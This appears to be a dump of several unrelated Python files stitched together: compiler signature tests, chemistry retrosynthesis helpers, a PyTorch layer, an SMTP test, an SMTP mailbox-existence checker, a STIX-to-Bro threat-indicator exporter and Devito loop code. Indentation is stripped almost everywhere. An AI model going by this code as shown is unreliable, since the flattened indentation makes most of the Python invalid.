ff()[0] = 1
@check_annotator_fails
@signature(types.list(types.char()), returns=types.int())
def mutate_in_body(l):
l[0] = 'abc'
return len(l)
def can_append():
l = ff()
l.append('b')
getsig(can_append)
def test_array():
@signature(returns=types.array(types.int()))
def f():
return [1]
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeList)
item = rettype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == False
def try_append():
l = f()
l.append(2)
check_annotator_fails(try_append)
def test_dict():
@signature(returns=types.dict(types.str(), types.int()))
def f():
return {'a': 1, 'b': 2}
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeDict)
assert rettype.dictdef.dictkey.s_value == model.SomeString()
assert rettype.dictdef.dictvalue.s_value == model.SomeInteger()
def test_instance():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3), returns=types.instance(C2))
def f(x):
assert isinstance(x, C2)
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
@check_annotator_fails
    def none_bad_for_body():
f(None)
def test_instance_or_none():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3, can_be_None=True), returns=types.instance(C2, can_be_None=True))
def f(x):
assert isinstance(x, C2) or x is None
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert argtype.can_be_None
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
assert rettype.can_be_None
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
def test_self():
@finishsigs
class C(object):
@signature(types.self(), types.self(), returns=types.none())
def f(self, other):
pass
class D1(C):
pass
class D2(C):
pass
def g():
D1().f(D2())
a = annotate_at(g)
argtype = sigof(a, C.__dict__['f'])[0]
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C
def test_self_error():
class C(object):
@signature(types.self(), returns=types.none())
def incomplete_sig_meth(self):
pass
exc = py.test.raises(SignatureError, annotate_at, C.incomplete_sig_meth).value
assert 'incomplete_sig_meth' in str(exc)
assert 'finishsigs' in str(exc)
def test_any_as_argument():
@signature(types.any(), types.int(), returns=types.float())
def f(x, y):
return x + y
@signature(types.int(), returns=types.float())
def g(x):
return f(x, x)
sig = getsig(g)
assert sig == [model.SomeInteger(), model.SomeFloat()]
@signature(types.float(), returns=types.float())
def g(x):
return f(x, 4)
sig = getsig(g)
assert sig == [model.SomeFloat(), model.SomeFloat()]
@signature(types.str(), returns=types.int())
def cannot_add_string(x):
return f(x, 2)
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
def test_return_any():
@signature(types.int(), returns=types.any())
def f(x):
return x
sig = getsig(f)
assert sig == [model.SomeInteger(), model.SomeInteger()]
@signature(types.str(), returns=types.any())
def cannot_add_string(x):
return f(3) + x
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
assert 'cannot_add_string' in str(exc)
@py.test.mark.xfail
def test_class_basic():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
def wrong_type():
c = C()
c.x = 'a'
check_annotator_fails(wrong_type)
def bad_field():
c = C()
c.y = 3
check_annotator_fails(bad_field)
@py.test.mark.xfail
def test_class_shorthand():
class C1(object):
_fields_ = {'x': FieldSpec(types.int)}
def wrong_type_1():
c = C1()
c.x = 'a'
check_annotator_fails(wrong_type_1)
class C2(object):
_fields_ = ClassSpec({'x': types.int})
def wrong_type_2():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type_2)
@py.test.mark.xfail
def test_class_inherit():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
class C1(C):
_fields_ = ClassSpec({'y': FieldSpec(types.int)})
class C2(C):
_fields_ = ClassSpec({'y': FieldSpec(types.int)}, inherit=True)
def no_inherit():
c = C1()
c.x = 3
check_annotator_fails(no_inherit)
def good():
c = C2()
c.x = 3
annotate_at(good)
def wrong_type():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type)
|
66732
|
import copy
from functools import wraps, reduce
import socket
import os
from operator import mul
import sys
from statistics import mean
import time
import numpy as np
from rdkit.Chem import AllChem, RWMol
from rdkit import Chem
from rdkit.Chem.rdChemReactions import ChemicalReaction
from kgcn.data_util import dense_to_sparse
from kgcn.preprocessing.utils import atom_features
from model_modules import predict_templates
class MoleculeUtils:
@staticmethod
def generate_ecfp(mol, radius=2, bits=2048):
""" Create Extended Connectivity FingerPrint
Args:
mol (Mol Object):
radius (int):
bits (int):
Returns:
Numpy array type ECFP
"""
fp = AllChem.GetMorganFingerprintAsBitVect(mol, radius, nBits=bits).ToBitString()
return np.asarray([[int(i) for i in list(fp)]])
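# Usage sketch (hypothetical input): MoleculeUtils.generate_ecfp(Chem.MolFromSmiles('CCO'))
# returns a (1, 2048) array of 0/1 ints, ready to feed to a template-prediction model.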
@staticmethod
def generate_gcn_descriptor(mol, atom_num_limit, label_dim):
""" Create GCN descriptor (adj, feat, label)
Args:
mol (Mol Object):
atom_num_limit (int):
label_dim (int):
Returns:
adj, feature, label
"""
# Prepare dummy label information
label_data = np.zeros(label_dim)
label_mask = np.zeros_like(label_data)
label_mask[~np.isnan(label_data)] = 1
# for index, mol in enumerate(mol):
Chem.SanitizeMol(mol, sanitizeOps=Chem.SANITIZE_ADJUSTHS)
# Create an adjacency matrix
mol_adj = Chem.GetAdjacencyMatrix(mol)
row_num = len(mol_adj)
adj = np.array(mol_adj, dtype=int)  # np.int was removed from NumPy; plain int is equivalent
# Set diagonal elements to 1, fill others with the adjacency matrix from RDKit
for i in range(row_num):
adj[i][i] = 1
# Create a feature matrix
feature = [atom_features(atom, degree_dim=17) for atom in mol.GetAtoms()]
for _ in range(atom_num_limit - len(feature)):
feature.append(np.zeros(len(feature[0]), dtype=int))
adj = dense_to_sparse(adj)
adj[2][:] = atom_num_limit
obj = {
"feature": np.asarray([feature]),
"adj": np.asarray([adj]),
"label": np.asarray([label_data]),
"mask_label": np.asarray([label_mask]),
"max_node_num": atom_num_limit
}
return obj
@staticmethod
def update_mol_condition(mol_conditions, mols, divided_mols, start_materials, idx):
""" Update the molecule condition if the molecules in start materials
Args:
mol_conditions (list[int]):
mols (list[Mol Object]):
divided_mols (list[Mol Object]):
start_materials (set[str]):
idx (int):
Returns:
"1" if the molecule is in start materials otherwise "0"
"""
mols.pop(idx)
mol_conditions.pop(idx)
for divided_mol in divided_mols:
mols.append(divided_mol)
smiles = Chem.MolToSmiles(divided_mol, canonical=True)
if SearchUtils.sequential_search(smiles, start_materials):
mol_conditions.append(1)
else:
mol_conditions.append(0)
@staticmethod
def get_unsolved_mol_condition_idx(mol_conditions):
""" Get indexes of mol_conditions whose condition is 0
Args:
mol_conditions (list[int]):
Returns:
"""
unsolved_idxs = []
for i in range(len(mol_conditions)):
if mol_conditions[i] == 0:
unsolved_idxs.append(i)
return unsolved_idxs
@staticmethod
def is_valid(mol):
""" Check whether Mol Object is valid
Args:
mol (list[Mol Object]):
Returns:
True if mol is valid otherwise False
"""
flag = Chem.SanitizeMol(mol, catchErrors=True)
return True if flag == Chem.SANITIZE_NONE else False
class ReactionUtils:
"""
Attributes:
mol (Mol Object):
"""
mol = None
rxn_candidates = []
sorted_rxn_prob_list = None
sorted_rxn_prob_idxs = None
def __init__(self, mol):
""" A constructor of ReactionUtils
Args:
mol (Mol Object):
"""
self.mol = mol
@staticmethod
def react_product_to_reactants(product, rxn_rule, gateway=None):
"""
Args:
product (Mol Object):
rxn_rule (Chemical Reaction):
gateway (JavaGateway):
Returns:
list(molecule object)
"""
return_list = []
if gateway:
product = Chem.MolToSmiles(product)
try:
reactants_list = gateway.entry_point.reactProductToReactants(product, rxn_rule)
for reactants in reactants_list:
if reactants is None or None in reactants:
continue
reactants = [Chem.MolFromSmiles(m) for m in reactants]
if reactants and None not in reactants:
return_list.append(reactants)
return return_list if return_list else None
except Exception:
return None
if ChemicalReaction.Validate(rxn_rule)[1] == 1 or rxn_rule.GetNumReactantTemplates() != 1:
return None
reactants_list = rxn_rule.RunReactants([product, ])
if not reactants_list:
return None
for reactants in reactants_list:
for reactant in reactants:
if not MoleculeUtils.is_valid(reactant):
continue
return_list.append(reactants)
return return_list if return_list else None
def set_reaction_candidates_and_probabilities(self, model, rxn_rules, model_name, config):
"""
Args:
model: Tensorflow model or Keras model instance
rxn_rules (list[Chemical Reaction]):
model_name (str):
config (dict):
"""
if config['descriptor'] == 'ECFP':
input_mol = MoleculeUtils.generate_ecfp(self.mol)
rxn_prob_list = predict_templates(model, input_mol, model_name, config)
elif config['descriptor'] == 'GCN':
input_mol = None
if model_name == 'expansion':
input_mol = MoleculeUtils.generate_gcn_descriptor(self.mol, config['max_atom_num'], len(rxn_rules))
elif model_name == 'rollout':
input_mol = MoleculeUtils.generate_gcn_descriptor(self.mol, config['max_atom_num'], len(rxn_rules))
rxn_prob_list = predict_templates(model, input_mol, model_name, config)
else:
print("[ERROR] Set 'descriptor' to ECFP or GCN")
sys.exit(1)
self.sorted_rxn_prob_idxs = np.argsort(-rxn_prob_list)
self.sorted_rxn_prob_list = rxn_prob_list[self.sorted_rxn_prob_idxs]
self.rxn_candidates = self.get_reaction_candidates(rxn_rules, config["expansion_num"])
@staticmethod
def get_reactions(rxn_rule_path, save_dir, use_reaction_complement=False):
def complement_reaction(rxn_template):
if rxn_template.GetNumProductTemplates() != 1:
print("[ERROR] A reaction template has only one product template.")
sys.exit(1)
pro = rxn_template.GetProductTemplate(0)
rw_pro = RWMol(pro)
amaps_pro = {a.GetAtomMapNum() for a in pro.GetAtoms()}
amaps_rcts = {a.GetAtomMapNum() for rct in rxn_template.GetReactants() for a in rct.GetAtoms()}
# drop product atoms that are already mapped in the reactants; the leftover
# atoms form the complementary reactant template added below
amaps_in_rcts = amaps_pro.intersection(amaps_rcts)
for amap in amaps_in_rcts:
aidx = [a.GetIdx() for a in rw_pro.GetAtoms() if a.GetAtomMapNum() == amap][0]
rw_pro.RemoveAtom(aidx)
m = rw_pro.GetMol()
if '.' in Chem.MolToSmarts(m):
return
if (m.GetNumAtoms() == 0) or (m.GetNumAtoms() == 1 and m.GetAtomWithIdx(0).GetSymbol() in {"*", None}):
return
rxn_template.AddReactantTemplate(m)
with open(rxn_rule_path, 'r') as f:
lines = [l.strip('\n') for l in f.readlines()]
if use_reaction_complement:
rxn_templates = []
for l in lines:
try:
rxn_templates.append(AllChem.ReactionFromSmarts(l))
except Exception as e:
rxn_templates.append(l)
for rxn_template in rxn_templates:
if type(rxn_template) == ChemicalReaction:
complement_reaction(rxn_template)
out_reactions = [AllChem.ReactionToSmarts(rt) if type(rt) == ChemicalReaction else rt for rt in rxn_templates]
basename, ext = os.path.splitext(os.path.basename(rxn_rule_path))
with open(os.path.join(save_dir, f"{basename}_complemented{ext}"), 'w') as f:
f.write('\n'.join(out_reactions))
return out_reactions
else:
return lines
@staticmethod
def get_reverse_reactions(rxn_rule_path):
"""
Args:
rxn_rule_path (str):
Returns:
list[RxnMolecule]
"""
with open(rxn_rule_path, 'r') as f:
lines = f.readlines()
split_rxn_rules = [l.strip().split('>>') for l in lines]
reverse_rxn_str = ['>>'.join(split_rxn_rule[::-1]) for split_rxn_rule in split_rxn_rules]
return [AllChem.ReactionFromSmarts(r) for r in reverse_rxn_str]
def get_reaction_candidates(self, rxn_rules, expansion_num, top_number=None):
"""
Args:
rxn_rules (list[Chemical Reaction]):
expansion_num (int):
top_number (int):
Returns:
"""
idxs = []
probs = []
if top_number is None: # for expansion
for i in range(len(self.sorted_rxn_prob_idxs)):
probs.append(self.sorted_rxn_prob_list[i])
idxs.append(self.sorted_rxn_prob_idxs[i])
if i+1 >= expansion_num:
break
rxn_cands = [rxn_rules[i] for i in idxs]
self.sorted_rxn_prob_list = probs
return rxn_cands
else: # for rollout
idxs = [self.sorted_rxn_prob_idxs[i] for i in range(top_number)]
rxn_cands = [rxn_rules[i] for i in idxs]
return rxn_cands
@staticmethod
def predict_reactions(rxn_rules, model, mol, model_name, config, top_number=None):
"""
Args:
rxn_rules (list[Chemical Reaction]):
model: Tensorflow model or Keras model instance
mol (Molecule):
model_name (str):
config (dict):
top_number (int): if not None, get top-N prediction values
Returns:
Lists of predicted Chemical Reaction(s) and reaction probabilities
"""
rxn = ReactionUtils(mol)
rxn.set_reaction_candidates_and_probabilities(model, rxn_rules, model_name, config)
if top_number is None:
return rxn.get_reaction_candidates(rxn_rules, config["expansion_num"]), rxn.sorted_rxn_prob_list
else:
return rxn.get_reaction_candidates(rxn_rules, config["expansion_num"], top_number), rxn.sorted_rxn_prob_list
class SearchUtils:
@staticmethod
def sequential_search(mol, start_materials):
"""
Args:
mol (str):
start_materials (set[str]):
Returns:
Boolean
"""
return mol in start_materials
@staticmethod
def is_proved(mol_conditions):
"""
Args:
mol_conditions (list[int]):
Returns:
"""
return all(i == 1 for i in mol_conditions)
@staticmethod
def is_terminal(mols, gateway=None):
"""
Args:
mols (list[Mol Object]):
gateway (JavaGateway):
Returns:
"""
str_mols = [Chem.MolToSmiles(m) for m in mols]
return gateway.entry_point.isTerminal(str_mols)
@staticmethod
def is_loop_route(mols, node):
""" Check whether a molecule is in a route.
Args:
mols (list[Mol Object]):
node (Node):
Returns:
True if a molecule is in a route otherwise False
"""
mols = [Chem.MolToSmiles(m) for m in mols]
while node is not None:
unresolved_mols = set(node.state.mols[i] for i, c in enumerate(node.state.mol_conditions) if c == 0)
unresolved_mols = [Chem.MolToSmiles(m) for m in unresolved_mols]
for m in mols:
if m in unresolved_mols:
return True
node = node.parent_node
return False
def timeit(func):
@wraps(func)
def wrapper(*args, **kargs):
print("[INFO] start")
start = time.time()
result = func(*args, **kargs)
elapsed_time = time.time() - start
print(f"[INFO] done in {elapsed_time:5f} s")
return result
return wrapper
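# Usage sketch: decorate any function to log its wall-clock time, e.g.
#
# @timeit
# def slow_op():
#     time.sleep(1)
#
# slow_op()  # prints "[INFO] start" then "[INFO] done in 1.0... s"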
def calculate_cdscore(product, reactants):
"""
Args:
product (Mol object):
reactants (list(Mol object)):
Returns:
score (float)
1 if the molecule was divided evenly; otherwise 0 < score < 1
(0 if there is only one reactant).
"""
if len(reactants) == 1:
return 0.
pro_atom_num = product.GetNumAtoms()
rct_atom_nums = [m.GetNumAtoms() for m in reactants]
scale_factor = pro_atom_num / len(rct_atom_nums)
abs_errors = [abs(r - scale_factor) for r in rct_atom_nums]
return 1 / (1 + mean(abs_errors))
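# Worked example (hypothetical atom counts): a 10-atom product split into two
# 5-atom reactants gives abs_errors == [0, 0] and a CDScore of 1.0; splitting
# into 8 and 2 atoms gives abs_errors == [3, 3], i.e. 1 / (1 + 3) = 0.25.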
def calculate_asscore(mol_condition_before, mol_condition_after, num_divided_mols):
"""
Args:
mol_condition_before (list):
mol_condition_after (list):
num_divided_mols (int):
Returns:
return 1 if all divided molecules were starting materials, otherwise 0 <= x < 1.
"""
if num_divided_mols == 1:
return 0.
return (mol_condition_after.count(1) - mol_condition_before.count(1)) / num_divided_mols
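# Worked example (hypothetical conditions): if a reaction produces two molecules
# and the count of solved entries rises from 1 to 3, the score is (3 - 1) / 2 = 1.0;
# if only one of the two is a starting material, the score is 0.5.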
def calculate_rdscore(product, reactants):
"""
Args:
product (Mol object):
reactants (list(Mol object)):
Returns:
score (float)
1 if the number of rings decreases from the product to the reactants, otherwise 0.
"""
try:
pro_ring_num = product.GetRingInfo().NumRings()
except Exception as e:
product.UpdatePropertyCache()
Chem.GetSymmSSSR(product)
pro_ring_num = product.GetRingInfo().NumRings()
rct_ring_nums = sum([m.GetRingInfo().NumRings() for m in reactants])
rdscore = pro_ring_num - rct_ring_nums
return 1. if rdscore > 0 else 0.
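# Example: a retro Diels-Alder step maps a one-ring product to acyclic
# diene/dienophile reactants, so pro_ring_num - rct_ring_nums == 1 and the
# RDScore is 1; steps that do not reduce the ring count score 0.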
def calculate_stscore(reactants, reaction_template):
"""
Args:
reactants (list(Mol object)):
reaction_template (str):
Returns:
score (float)
1 if each reactant matches its template substructure exactly once,
otherwise 1 / (number of match combinations).
"""
patts_for_rct = [Chem.MolFromSmarts(patt) for patt in reaction_template.split(">>")[0].split(".")]
match_patts = []
for rct, patt in zip(reactants, patts_for_rct):
match_patts.append(len(rct.GetSubstructMatches(patt, useChirality=True)))
match_patts = [1 if patt == 0 else patt for patt in match_patts]
return 1 / reduce(mul, match_patts)
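# Worked example (hypothetical template): with two reactants each matching their
# SMARTS pattern exactly once, match_patts == [1, 1] and the STScore is 1; if one
# reactant matches its pattern twice, the score drops to 1 / 2.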
def is_port_in_used(port):
"""
Args:
port (int):
Returns:
return True if the port is in use, otherwise False
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(("localhost", port)) == 0
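# Usage sketch (port number is an assumption): guard a Py4J gateway launch, e.g.
# if is_port_in_used(25333):
#     sys.exit('[ERROR] port 25333 is already taken')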
def get_default_config():
"""
Returns:
return config dict
"""
config = {
"max_atom_num": 50,
"search_count": 100,
"rollout_depth": 5,
"expansion_model": "model/model.sample.ckpt",
"expansion_rules": "data/sample_reaction_rule.csv",
"rollout_model": "model/model.sample.ckpt",
"rollout_rules": "data/sample_reaction_rule.csv",
"descriptor": "GCN",
"gcn_expansion_config": "model/sample.json",
"gcn_rollout_config": "model/sample.json",
"starting_material": "data/starting_materials.smi",
"save_result_dir": "result",
"target": "data/sample.mol"
}
return config
def get_node_info(node, ws):
"""
Args:
node (Node):
ws (list(int)): knowledge weights. [cdscore, rdscore, asscore, stscore]
Returns:
return node information for a searched tree analysis
node information: self node, parent node, depth, score, RDScore, CDScore, STScore, ASScore
"""
return (f"{id(node)}\t"
f"{id(node.parent_node)}\t"
f"{node.depth}\t"
f"{node.total_scores / node.visits}\t"
f"{node.state.rdscore}\t"
f"{node.state.cdscore * ws[0]}\t"
f"{node.state.stscore * ws[3]}\t"
f"{node.state.asscore * ws[2]}")
|
66779
|
import torch
import torchvision
import torchvision.transforms as transforms
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
class conv2d_circular(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True, nopad=False):
super(conv2d_circular, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)
def forward(self, input_ori):
# F.pad's pad tuple for 4-D input is (left, right, top, bottom); use the width
# padding for left/right and the height padding for top/bottom so non-square
# padding also wraps correctly, then convolve with zero padding.
input = F.pad(input_ori,
(self.padding[1], self.padding[1], self.padding[0], self.padding[0]),
mode="circular")
return F.conv2d(input, self.weight, self.bias, self.stride, 0, self.dilation, self.groups)
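# Minimal usage sketch: circular padding makes opposite borders neighbours, which
# suits periodic inputs such as 360-degree panoramas.
#
# conv = conv2d_circular(3, 8, kernel_size=3, padding=1)
# y = conv(torch.randn(2, 3, 16, 16))  # -> (2, 8, 16, 16), no zero-border artefacts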
|
66823
|
import io
from os.path import dirname, abspath, join
from nanohttp import settings, configure
from restfulpy.messaging.providers import SMTPProvider
from restfulpy.mockup import mockup_smtp_server
HERE = abspath(dirname(__file__))
def test_smtp_provider():
configure(force=True)
settings.merge(f'''
smtp:
host: smtp.example.com
port: 587
username: <EMAIL>
password: password
local_hostname: localhost
tls: false
auth: false
ssl: false
messaging:
mako_modules_directory: {join(HERE, '../../data', 'mako_modules')}
template_directories:
- {join(HERE, 'templates')}
''',
)
with mockup_smtp_server() as (server, bind):
settings.smtp.host = bind[0]
settings.smtp.port = bind[1]
# Without templates
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
'Simple test body',
cc='<EMAIL>',
bcc='<EMAIL>'
)
# With template
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
{},
template_filename='test-email-template.mako'
)
# With attachments
attachment = io.BytesIO(b'This is test attachment file')
attachment.name = 'path/to/file.txt'
SMTPProvider().send(
'<EMAIL>',
'<EMAIL>',
'email body with Attachment',
attachments=[attachment]
)
|
66836
|
import re
import smtplib
import dns.resolver
# Address used for SMTP MAIL FROM command
fromAddress = '<EMAIL>'
# Simple Regex for syntax checking
regex = r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'
# Email address to verify
inputAddress = input('Please enter the emailAddress to verify:')
addressToVerify = str(inputAddress)
# Syntax check
match = re.match(regex, addressToVerify)
if match is None:
print('Bad Syntax')
raise ValueError('Bad Syntax')
# Get domain for DNS lookup
splitAddress = addressToVerify.split('@')
domain = str(splitAddress[1])
print('Domain:', domain)
# MX record lookup
records = dns.resolver.resolve(domain, 'MX')  # resolve() supersedes the deprecated query() in dnspython 2.x
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
# SMTP lib setup (use debug level for full output)
server = smtplib.SMTP()
server.set_debuglevel(0)
# SMTP Conversation
server.connect(mxRecord)
server.helo(server.local_hostname)  # local_hostname is the fully qualified name smtplib detected for this host
server.mail(fromAddress)
code, message = server.rcpt(str(addressToVerify))
server.quit()
#print(code)
#print(message)
# Assume SMTP response 250 is success
if code == 250:
print('Success')
else:
print('Bad')
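# Caveat: many mail servers accept RCPT TO for any mailbox (catch-all) or always
# answer 250 to deter enumeration, so 'Success' here does not prove the mailbox exists.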
|
66849
|
import re
from cybox.objects.address_object import Address
from cybox.objects.uri_object import URI
from .text import StixTextTransform
class StixBroIntelTransform(StixTextTransform):
"""Generate observable details for the Bro Intelligence Framework.
This class can be used to generate a list of indicators (observables)
from a STIX package in a format suitable for importing into the Bro
network-based intrusion detection system using its Intelligence
Framework (see https://www.bro.org/sphinx-git/frameworks/intel.html).
Args:
package: the STIX package to process
separator: a string separator used in the text output
include_header: a boolean value that indicates whether or not header
information should be included in the text output
header_prefix: a string prepended to header lines in the output
source: a value to include in the output metadata field 'meta.source'
url: a value to include in the output field metadata 'meta.url'
do_notice: a value to include in the output metadata field
'meta.do_notice', if set to 'T' a Bro notice will be raised by Bro
on a match of this indicator
"""
OBJECT_FIELDS = {
'Address': ['address_value'],
'DomainName': ['value'],
'EmailMessage': [
'header.from_.address_value',
'header.to.address_value',
],
'File': ['hashes.simple_hash_value'],
'HTTPSession': ['http_request_response.http_client_request.' +
'http_request_header.parsed_header.user_agent'],
'SocketAddress': ['ip_address.address_value'],
'URI': ['value'],
}
OBJECT_CONSTRAINTS = {
'Address': {
'category': [Address.CAT_IPV4, Address.CAT_IPV6],
},
'URI': {
'type_': [URI.TYPE_URL],
},
}
STRING_CONDITION_CONSTRAINT = ['None', 'Equals']
HEADER_LABELS = [
'indicator', 'indicator_type', 'meta.source', 'meta.url',
'meta.do_notice', 'meta.if_in', 'meta.whitelist',
]
# Map Cybox object type to Bro Intel types.
BIF_TYPE_MAPPING = {
'Address': 'Intel::ADDR',
'DomainName': 'Intel::DOMAIN',
'EmailMessage': 'Intel::EMAIL',
'File': 'Intel::FILE_HASH',
'HTTPSession': 'Intel::SOFTWARE',
'SocketAddress': 'Intel::ADDR',
'URI': 'Intel::URL',
}
# Map observable id prefix to source and url.
BIF_SOURCE_MAPPING = {
'cert_au': {
'source': 'CERT-AU',
'url': 'https://www.cert.gov.au/',
},
'CCIRC-CCRIC': {
'source': 'CCIRC',
'url': ('https://www.publicsafety.gc.ca/' +
'cnt/ntnl-scrt/cbr-scrt/ccirc-ccric-eng.aspx'),
},
'NCCIC': {
'source': 'NCCIC',
'url': 'https://www.us-cert.gov/',
},
}
def __init__(self, package, default_title=None, default_description=None,
default_tlp='AMBER', separator='\t', include_header=False,
header_prefix='#', source='UNKNOWN', url='', do_notice='T'):
super(StixBroIntelTransform, self).__init__(
package, default_title, default_description, default_tlp,
separator, include_header, header_prefix,
)
self.source = source
self.url = url
self.do_notice = do_notice
# Make URIs suitable for the Bro format (remove protocol)
self._fix_uris()
# ##### Properties
@property
def source(self):
return self._source
@source.setter
def source(self, source):
self._source = '' if source is None else str(source)
@property
def url(self):
return self._url
@url.setter
def url(self, url):
self._url = '' if url is None else str(url)
@property
def do_notice(self):
return self._do_notice
@do_notice.setter
def do_notice(self, do_notice):
if do_notice not in ['T', 'F']:
raise TypeError('expected \'T\' or \'F\'')
self._do_notice = do_notice
# ##### Class helper methods
def _fix_uris(self):
if 'URI' in self.observables:
for observable in self.observables['URI']:
if 'fields' in observable:
for field in observable['fields']:
if 'value' in field:
field['value'] = re.sub(
pattern=r'^(https?|ftp)://',
repl='',
string=field['value'],
)
# ##### Overridden class methods
def text_for_object_type(self, object_type):
text = ''
if object_type in self.observables:
for observable in self.observables[object_type]:
# Look up source and url from observable ID
id_prefix = observable['id'].split(':')[0]
if id_prefix in self.BIF_SOURCE_MAPPING:
source = self.BIF_SOURCE_MAPPING[id_prefix]['source']
url = self.BIF_SOURCE_MAPPING[id_prefix]['url']
else:
source = self.source
url = self.url
bif_type = self.BIF_TYPE_MAPPING[object_type]
for fields in observable['fields']:
for field in self.OBJECT_FIELDS[object_type]:
if field in fields:
field_values = [
fields[field],
bif_type,
source,
url,
self.do_notice,
'-',
'-',
]
text += self.join(field_values) + '\n'
return text
|
66977
|
class Solution:
# @param {integer} x
# @return {integer}
def reverse(self, x):
neg = False
if x<0:
neg =True
x = -x
reversed_int = int(''.join(reversed(str(x))))
if neg:
reversed_int = -reversed_int
# values outside the signed 32-bit range must be reported as 0
if reversed_int < -(1 << 31) or reversed_int > (1 << 31) - 1:
return 0
return reversed_int
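# Example: Solution().reverse(-123) returns -321, while
# Solution().reverse(1534236469) reverses to 9646324351, which exceeds
# 2**31 - 1, so 0 is returned.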
|
66983
|
import cgen as c
from sympy import Symbol
from devito.cgen_utils import ccode
from devito.ir.iet import (Expression, Iteration, List, UnboundedIndex, ntags,
FindAdjacentIterations, FindNodes, IsPerfectIteration,
NestedTransformer, Transformer, compose_nodes,
is_foldable, retrieve_iteration_tree)
from devito.symbolics import as_symbol, xreplace_indices
from devito.tools import as_tuple
__all__ = ['fold_blockable_tree', 'unfold_blocked_tree']
def fold_blockable_tree(node, exclude_innermost=False):
"""
Create :class:`IterationFold`s from sequences of nested :class:`Iteration`.
"""
found = FindAdjacentIterations().visit(node)
found.pop('seen_iteration')
mapper = {}
for k, v in found.items():
for i in v:
# Pre-condition: they all must be perfect iterations
assert len(i) > 1
if any(not IsPerfectIteration().visit(j) for j in i):
continue
# Only retain consecutive trees having same depth
trees = [retrieve_iteration_tree(j)[0] for j in i]
handle = []
for j in trees:
if len(j) != len(trees[0]):
break
handle.append(j)
trees = handle
if not trees:
continue
# Check foldability
pairwise_folds = list(zip(*reversed(trees)))
if any(not is_foldable(j) for j in pairwise_folds):
continue
# Maybe heuristically exclude innermost Iteration
if exclude_innermost is True:
pairwise_folds = pairwise_folds[:-1]
# Perhaps there's nothing to fold
if len(pairwise_folds) == 1:
continue
# Perform folding
for j in pairwise_folds:
root, remainder = j[0], j[1:]
folds = [(tuple(y-x for x, y in zip(i.offsets, root.offsets)), i.nodes)
for i in remainder]
mapper[root] = IterationFold(folds=folds, **root.args)
for k in remainder:
mapper[k] = None
# Insert the IterationFolds in the Iteration/Expression tree
processed = NestedTransformer(mapper).visit(node)
return processed
def unfold_blocked_tree(node):
"""
Unfold nested :class:`IterationFold`.
:Example:
Given a section of Iteration/Expression tree as below: ::
for i = 1 to N-1 // folded
for j = 1 to N-1 // folded
foo1()
Assuming a fold with offset 1 in both /i/ and /j/ and body ``foo2()``, create: ::
for i = 1 to N-1
for j = 1 to N-1
foo1()
for i = 2 to N-2
for j = 2 to N-2
foo2()
"""
# Search the unfolding candidates
candidates = []
for tree in retrieve_iteration_tree(node):
handle = tuple(i for i in tree if i.is_IterationFold)
if handle:
# Sanity check
assert IsPerfectIteration().visit(handle[0])
candidates.append(handle)
# Perform unfolding
tag = ntags()
mapper = {}
for tree in candidates:
trees = list(zip(*[i.unfold() for i in tree]))
# Update tag
for i, _tree in enumerate(list(trees)):
trees[i] = tuple(j.retag(tag + i) for j in _tree)
trees = optimize_unfolded_tree(trees[:-1], trees[-1])
mapper[tree[0]] = List(body=trees)
# Insert the unfolded Iterations in the Iteration/Expression tree
processed = Transformer(mapper).visit(node)
return processed
def optimize_unfolded_tree(unfolded, root):
"""
Transform folded trees to reduce the memory footprint.
Examples
========
Given:
.. code-block::
for i = 1 to N - 1 # Folded tree
for j = 1 to N - 1
tmp[i,j] = ...
for i = 2 to N - 2 # Root
for j = 2 to N - 2
... = ... tmp[i,j] ...
The temporary ``tmp`` has shape ``(N-1, N-1)``. However, as soon as the
iteration space is blocked, with blocks of shape ``(i_bs, j_bs)``, the
``tmp`` shape can be shrunk to ``(i_bs-1, j_bs-1)``. The resulting
iteration tree becomes:
.. code-block::
for i = 1 to i_bs + 1 # Folded tree
for j = 1 to j_bs + 1
i' = i + i_block - 2
j' = j + j_block - 2
tmp[i,j] = ... # use i' and j'
for i = i_block to i_block + i_bs # Root
for j = j_block to j_block + j_bs
i' = i - i_block
j' = j - j_block
... = ... tmp[i',j'] ...
"""
processed = []
for i, tree in enumerate(unfolded):
assert len(tree) == len(root)
modified_tree = []
modified_root = []
mapper = {}
# "Shrink" the iteration space
for t1, t2 in zip(tree, root):
index = Symbol('%ss%d' % (t1.index, i))
mapper[t1.dim] = index
t1_uindex = (UnboundedIndex(index, t1.limits[0]),)
t2_uindex = (UnboundedIndex(index, -t1.limits[0]),)
limits = (0, t1.limits[1] - t1.limits[0], t1.incr_symbolic)
modified_tree.append(t1._rebuild(limits=limits,
